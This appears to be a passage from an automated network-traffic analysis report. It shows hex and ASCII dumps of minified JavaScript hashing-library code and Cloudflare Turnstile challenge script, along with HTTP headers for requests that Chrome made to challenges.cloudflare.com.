                                                          2024-08-27 22:10:39 UTC1369INData Raw: 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c 49 5b 30
                                                          Data Ascii: for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|I[0
                                                          2024-08-27 22:10:39 UTC1369INData Raw: 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66
                                                          Data Ascii: r,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:f
                                                          2024-08-27 22:10:39 UTC1369INData Raw: 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50
                                                          Data Ascii: harAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOP
                                                          2024-08-27 22:10:39 UTC1369INData Raw: 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 69
                                                          Data Ascii: a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=thi
                                                          2024-08-27 22:10:39 UTC1369INData Raw: 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41
                                                          Data Ascii: ),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          12192.168.2.449757104.18.94.414431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:10:39 UTC383OUTGET /turnstile/v0/b/6790c32b9fc9/api.js HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-08-27 22:10:40 UTC471INHTTP/1.1 200 OK
                                                          Date: Tue, 27 Aug 2024 22:10:39 GMT
                                                          Content-Type: application/javascript; charset=UTF-8
                                                          Content-Length: 45035
                                                          Connection: close
                                                          accept-ranges: bytes
                                                          last-modified: Thu, 15 Aug 2024 16:28:23 GMT
                                                          cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                          access-control-allow-origin: *
                                                          cross-origin-resource-policy: cross-origin
                                                          Server: cloudflare
                                                          CF-RAY: 8b9f6497de984394-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-08-27 22:10:40 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 53 74 28 65 2c 72 2c 61 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 5f 3d 65 5b 75 5d 28 67 29 2c 70 3d 5f 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 66 29 7b 61 28 66 29 3b 72 65 74 75 72 6e 7d 5f 2e 64 6f 6e 65 3f 72 28 70 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 70 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 4f 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 61 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 61 29 3b 66 75 6e 63 74
                                                          Data Ascii: "use strict";(function(){function St(e,r,a,o,c,u,g){try{var _=e[u](g),p=_.value}catch(f){a(f);return}_.done?r(p):Promise.resolve(p).then(o,c)}function Ot(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var u=e.apply(r,a);funct
                                                          2024-08-27 22:10:40 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 5f 72 28 65 2c 72 29 7b 76 61 72 20 61 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 61 2e 70 75 73 68 2e 61 70 70 6c 79 28 61 2c 6f 29 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 24 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                          Data Ascii: e}function _r(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),a.push.apply(a,o)}return a}function $e(e,r){return r=r!=nu
                                                          2024-08-27 22:10:40 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 4a 65 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 62 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 43 74 28 65 29 7c 7c 4e 74 28 65 2c 72 29 7c 7c 4c 74 28 65 2c 72 29 7c 7c 6b 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 4e 65 28 65 2c 72 29 7b 76 61 72 20 61 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                          Data Ascii: ray$/.test(a))return Je(e,r)}}function be(e,r){return Ct(e)||Nt(e,r)||Lt(e,r)||kt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ne(e,r){var a={label:0,sent:function(){if(u[0
                                                          2024-08-27 22:10:40 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 46 74 3d 33 30 30 30 32 30 3b 76 61 72 20 6b 65 3d 33 30 30 30 33 30 3b 76 61 72 20 4c 65 3d 33 30 30 30 33 31 3b 76 61 72 20 42 3b 28 66 75
                                                          Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Ft=300020;var ke=300030;var Le=300031;var B;(fu
                                                          2024-08-27 22:10:40 UTC1369INData Raw: 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 75 65 7c 7c 28 75 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 52 45 4e 44 45 52 3d 22 72 65 6e 64 65 72 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 7d 29 28 70 65 7c 7c 28 70 65 3d 7b 7d 29 29 3b 76 61 72 20 6c 65 3b 28 66 75 6e
                                                          Data Ascii: e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ue||(ue={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(function(e){e.RENDER="render",e.EXECUTE="execute"})(pe||(pe={}));var le;(fun
                                                          2024-08-27 22:10:40 UTC1369INData Raw: 76 61 72 20 59 3d 22 30 2f 30 22 3b 66 75 6e 63 74 69 6f 6e 20 66 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 21 3d 3d 22 64
                                                          Data Ascii: var Y="0/0";function ft(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clearance_level!=="d
                                                          2024-08-27 22:10:40 UTC1369INData Raw: 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 63 2c 75 3d 4c 28 78 72 2c 28 63 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 63 21 3d 3d 76 6f 69 64 20 30 3f 63 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 67 2c 5f 3d 4c 28 77 72 2c 28 67 3d 28 61 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 61 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 61 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 67 21 3d 3d 76 6f 69 64 20 30 3f 67 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 3b 72 65 74 75 72 6e 20 6f 26 26 75 3f 22
                                                          Data Ascii: HAVING_TROUBLES,c,u=L(xr,(c=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&c!==void 0?c:"nonexistent"),g,_=L(wr,(g=(a=e.displayLanguage)===null||a===void 0?void 0:a.toLowerCase())!==null&&g!==void 0?g:"nonexistent");return o&&u?"
                                                          2024-08-27 22:10:40 UTC1369INData Raw: 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 61 29 7d 2c 73 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 5a 74 28 65 29 7b 72 65 74 75 72 6e 20 46 75 6e 63 74 69 6f 6e 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 65 29 2e 69 6e 64 65 78 4f 66 28 22 5b 6e 61 74 69 76 65 20 63 6f 64 65 5d 22 29 21 3d 3d 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 50 65 28 65 29 7b 76 61 72 20 72 3d 74 79 70 65 6f 66 20 4d 61 70 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 6e 65 77 20 4d 61 70 3a 76 6f 69 64 20 30 3b 72 65 74 75 72 6e 20 50 65 3d 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 69 66 28 6f 3d 3d 3d 6e 75 6c 6c 7c 7c 21 5a 74 28 6f 29 29 72 65 74 75 72 6e 20 6f 3b 69 66 28 74 79 70 65 6f 66 20 6f 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29
                                                          Data Ascii: __proto__||Object.getPrototypeOf(a)},se(e)}function Zt(e){return Function.toString.call(e).indexOf("[native code]")!==-1}function Pe(e){var r=typeof Map=="function"?new Map:void 0;return Pe=function(o){if(o===null||!Zt(o))return o;if(typeof o!="function")
                                                          2024-08-27 22:10:40 UTC1369INData Raw: 72 69 70 74 45 6c 65 6d 65 6e 74 29 26 26 65 2e 74 65 73 74 28 72 2e 73 72 63 29 29 72 65 74 75 72 6e 20 72 3b 66 6f 72 28 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 73 63 72 69 70 74 22 29 2c 6f 3d 30 2c 63 3b 63 3d 61 5b 6f 5d 3b 6f 2b 2b 29 69 66 28 50 28 63 2c 48 54 4d 4c 53 63 72 69 70 74 45 6c 65 6d 65 6e 74 29 26 26 65 2e 74 65 73 74 28 63 2e 73 72 63 29 29 72 65 74 75 72 6e 20 63 7d 66 75 6e 63 74 69 6f 6e 20 61 72 28 29 7b 76 61 72 20 65 3d 67 74 28 29 3b 65 7c 7c 76 28 22 43 6f 75 6c 64 20 6e 6f 74 20 66 69 6e 64 20 54 75 72 6e 73 74 69 6c 65 20 73 63 72 69 70 74 20 74 61 67 2c 20 73 6f 6d 65 20 66 65 61 74 75 72 65 73 20 6d 61 79 20 6e 6f 74 20 62 65 20 61 76 61 69 6c 61 62 6c 65 22 2c 34
                                                          Data Ascii: riptElement)&&e.test(r.src))return r;for(var a=document.querySelectorAll("script"),o=0,c;c=a[o];o++)if(P(c,HTMLScriptElement)&&e.test(c.src))return c}function ar(){var e=gt();e||v("Could not find Turnstile script tag, some features may not be available",4
                                                          2024-08-27 22:10:40 UTC1369INData Raw: 28 22 61 6c 6c 6f 77 22 2c 22 63 72 6f 73 73 2d 6f 72 69 67 69 6e 2d 69 73 6f 6c 61 74 65 64 3b 20 66 75 6c 6c 73 63 72 65 65 6e 22 29 2c 66 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 61 6e 64 62 6f 78 22 2c 22 61 6c 6c 6f 77 2d 73 61 6d 65 2d 6f 72 69 67 69 6e 20 61 6c 6c 6f 77 2d 73 63 72 69 70 74 73 20 61 6c 6c 6f 77 2d 70 6f 70 75 70 73 20 61 6c 6c 6f 77 2d 66 6f 72 6d 73 22 29 2c 66 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 63 72 6f 6c 6c 69 6e 67 22 2c 22 6e 6f 22 29 2c 66 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 57 69 64 74 68 3d 22 30 70 78 22 2c 66 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 25 22 2c 66 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 25 22 2c 66 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 3d 22 68 69 64 64
                                                          Data Ascii: ("allow","cross-origin-isolated; fullscreen"),f.setAttribute("sandbox","allow-same-origin allow-scripts allow-popups allow-forms"),f.setAttribute("scrolling","no"),f.style.borderWidth="0px",f.style.width="100%",f.style.height="100%",f.style.overflow="hidd


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          13192.168.2.449758104.18.94.414431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:10:39 UTC798OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/idxkc/0x4AAAAAAAhuDbq9Zssi-YOu/auto/fbE/normal/auto/ HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          sec-ch-ua-platform: "Windows"
                                                          Upgrade-Insecure-Requests: 1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Sec-Fetch-Site: cross-site
                                                          Sec-Fetch-Mode: navigate
                                                          Sec-Fetch-Dest: iframe
                                                          Referer: https://kpl2.r04ar2.com/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-08-27 22:10:40 UTC1362INHTTP/1.1 200 OK
                                                          Date: Tue, 27 Aug 2024 22:10:40 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 74464
                                                          Connection: close
                                                          content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                          cross-origin-embedder-policy: require-corp
                                                          cross-origin-opener-policy: same-origin
                                                          origin-agent-cluster: ?1
                                                          critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                          referrer-policy: same-origin
                                                          cross-origin-resource-policy: cross-origin
                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                          document-policy: js-profiling
                                                          permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                          accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                          2024-08-27 22:10:40 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 62 39 66 36 34 39 37 65 65 38 32 30 66 61 34 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                          Data Ascii: Server: cloudflareCF-RAY: 8b9f6497ee820fa4-EWRalt-svc: h3=":443"; ma=86400
                                                          2024-08-27 22:10:40 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
